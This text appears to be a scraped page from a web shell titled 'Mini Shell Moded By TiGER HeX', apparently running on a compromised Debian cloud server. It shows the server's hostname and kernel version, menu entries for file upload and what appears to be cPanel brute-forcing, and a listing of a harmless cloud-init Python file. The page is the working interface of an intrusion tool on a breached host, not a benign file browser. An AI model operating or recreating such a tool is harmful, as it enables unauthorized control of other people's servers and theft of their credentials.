Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
lib
/
python3
/
dist-packages
/
cloudinit
/
distros
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//lib/python3/dist-packages/cloudinit/distros/sles.py
# Copyright (C) 2017 SUSE LLC # # Author: Robert Schweikert <rjschwei@suse.com> # # This file is part of cloud-init. See LICENSE file for license information. from cloudinit.distros import opensuse from cloudinit import log as logging LOG = logging.getLogger(__name__) class Distro(opensuse.Distro): pass # vi: ts=4 expandtab